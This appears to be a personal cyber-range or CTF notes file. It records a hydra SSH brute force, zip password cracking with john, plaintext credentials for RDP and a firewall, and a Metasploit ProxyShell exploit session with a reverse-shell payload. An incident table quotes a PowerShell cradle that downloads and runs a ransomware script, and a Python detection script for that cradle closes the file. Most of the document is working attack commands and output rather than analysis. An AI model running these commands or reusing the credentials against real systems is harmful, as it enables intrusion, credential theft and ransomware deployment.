# Buffer2

## Commands

```bash
hydra -V -f -t 4 -l user -P Desktop/rockyou7.txt ssh://10.11.1.254
```

Listing of the encrypted web root (every file carries the `.encr` extension; `encr.sh` is empty):

```
-rw-r--r-- 1 root www-data    90 Mar  5 10:31 11FLAG.txt.encr
-rw-r--r-- 1 root www-data  8970 Mar  5 10:31 authorize.php.encr
-rw-r--r-- 1 root www-data  1020 Mar  5 10:31 cron.php.encr
-rw-r--r-- 1 root root         0 Mar 11 08:26 encr.sh
-rw-r--r-- 1 root www-data   760 Mar  5 10:31 index.php.encr
-rw-r--r-- 1 root www-data   975 Mar  5 10:31 install.php.encr
-rw-r--r-- 1 root www-data   130 Mar  5 10:31 shell.php.encr
-rw-r--r-- 1 root www-data 27105 Mar  5 10:31 update.php.encr
-rw-r--r-- 1 root www-data   610 Mar  5 10:31 xmlrpc.php.encr
```

/var/log/messages

```bash
rdesktop -u Администратор -p Maggie1 10.11.239.5
```

10.11.4.10:/документы/11password.zip

https://dropmefiles.com/A2yjV

```bash
zip2john 11password.zip > zip.hashes
john --wordlist=./rockyou7.txt zip.hashes
```

jonny -> pass 12994

```
Password on FW with suricata and pcap logs user:Tinker1
```

# Suricata

https://dropmefiles.com/Y08fi trf.pcap

# Other

```
admin@elto-portal2:/var/www/html$ cat 11FLAG.txt
Accidit in puncto, quod non speratur in anno
```

https://dropmefiles.com/eRISD
https://github.com/horizon3ai/proxyshell.git
https://michlstechblog.info/blog/powershell-en-and-decrypt-string-with-aes256/

```
md5sum sploit
95c67d2fb318d6ac438533e419a8cc28  sploit
```

| Field | Value |
| --- | --- |
| Attacker actions within the stage | Data encryption |
| Executed OS command | `cmd.exe /Q /c powershell.exe -ep bypass (new-object system.net.webclient).DownloadFile('http://10.11.200.50/Ransom.ps1','C:\Ransom.ps1');import-module C:\Ransom.ps1; Ransom -IP 10.11.200.50 1> \\127.0.0.1\ADMIN$\__1646476419.946397 2>&1` |
| Active user account | `company\Administrator` |
| Tool/software used | `powershell`, `System.Core.dll` |
| Malicious sample name | `Ransom.ps1` |
| MD5 hash of the file sample | `caa67f501acbecbc293e98dae7b86621` |

```bash
rdesktop -u Администратор -p Maggie1 10.11.4.10
```

```
msf6 > use exploit/windows/http/exchange_proxyshell_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/exchange_proxyshell_rce) > set rhosts 10.11.3.20
rhosts => 10.11.3.20
msf6 exploit(windows/http/exchange_proxyshell_rce) > set lhost 10.11.5.12
lhost => 10.11.5.12
msf6 exploit(windows/http/exchange_proxyshell_rce) > set lport 13378
lport => 13378
msf6 exploit(windows/http/exchange_proxyshell_rce) > run
```
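As an added detection example (not part of the original notes), the Python script below scans process-creation log records for the PowerShell download-cradle pattern recorded in the data-encryption table above: an execution-policy bypass, a `System.Net.WebClient` download, import of a dropped `.ps1` from the drive root, and output redirected into the `ADMIN$` share under a `__<epoch>` name. The log format (tab-separated timestamp, host, user, command line), the indicator names and the flagging threshold are assumptions made for this example; the first sample record reproduces the command from the table, the other two are benign lines constructed for contrast.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Named indicator patterns so each finding says *why* the record was flagged.
# Names and weights are assumptions for this example, not a vendor ruleset.
INDICATORS = {
    # -ep bypass / -exec bypass / -ExecutionPolicy bypass
    "execution_policy_bypass": re.compile(r"-e(?:p|xec(?:utionpolicy)?)\s+bypass", re.I),
    # (New-Object System.Net.WebClient).DownloadFile( / .DownloadString(
    "webclient_download": re.compile(r"net\.webclient\)?\.download(?:file|string)\s*\(", re.I),
    # Import-Module of a script sitting directly on a drive, e.g. C:\Ransom.ps1
    "import_module_from_file": re.compile(r"import-module\s+[a-z]:\\[^;\s]+\.ps1", re.I),
    # stdout/stderr pushed into \\127.0.0.1\ADMIN$\__<epoch>: remote-exec output capture
    "admin_share_redirect": re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+", re.I),
}

# Pull the download URL and the drop path out of DownloadFile('url','path').
DOWNLOAD_ARGS = re.compile(
    r"download(?:file|string)\s*\(\s*['\"]([^'\"]+)['\"](?:\s*,\s*['\"]([^'\"]+)['\"])?", re.I
)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    indicators: List[str]
    url: Optional[str] = None
    dropped_path: Optional[str] = None


def analyze_command_line(cmd: str) -> Tuple[List[str], Optional[str], Optional[str]]:
    """Return matched indicator names plus any download URL / drop path found."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    url = path = None
    m = DOWNLOAD_ARGS.search(cmd)
    if m:
        url, path = m.group(1), m.group(2)
    return hits, url, path


def scan_log(lines, threshold: int = 2) -> List[Finding]:
    """Flag records that match at least `threshold` indicators.

    A single indicator (e.g. -ep bypass on a scheduled admin script) is too
    noisy on its own; the cradle in the incident table trips all four.
    """
    findings = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        try:
            ts, host, user, cmd = line.split("\t", 3)
        except ValueError:
            continue  # malformed record: skip it rather than abort the scan
        hits, url, path = analyze_command_line(cmd)
        if len(hits) >= threshold:
            findings.append(Finding(ts, host, user, hits, url, path))
    return findings


# Constructed sample log. Record 1 is the command from the incident table
# (the __1646476419 suffix is 2022-03-05T10:33:39Z); records 2 and 3 are benign.
SAMPLE_LOG = """\
2022-03-05T10:33:39Z\tWS01\tcompany\\Administrator\tcmd.exe /Q /c powershell.exe -ep bypass (new-object system.net.webclient).DownloadFile('http://10.11.200.50/Ransom.ps1','C:\\Ransom.ps1');import-module C:\\Ransom.ps1; Ransom -IP 10.11.200.50 1> \\\\127.0.0.1\\ADMIN$\\__1646476419.946397 2>&1
2022-03-05T10:35:10Z\tWS01\tcompany\\jdoe\tpowershell.exe -NoProfile -Command Get-Service -Name Spooler
2022-03-05T10:36:45Z\tWS02\tcompany\\svc_backup\tpowershell.exe -ep bypass -File C:\\Scripts\\backup.ps1
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f.timestamp} {f.host} {f.user}: {', '.join(f.indicators)}")
        if f.url:
            print(f"  fetched {f.url} -> {f.dropped_path}")
```

The extracted URL and drop path give the responder the same IoCs the table lists (`Ransom.ps1` from `10.11.200.50`) without reading the whole command line, and the `ADMIN$\__<epoch>` redirect is a useful pivot for finding other hosts executed the same way.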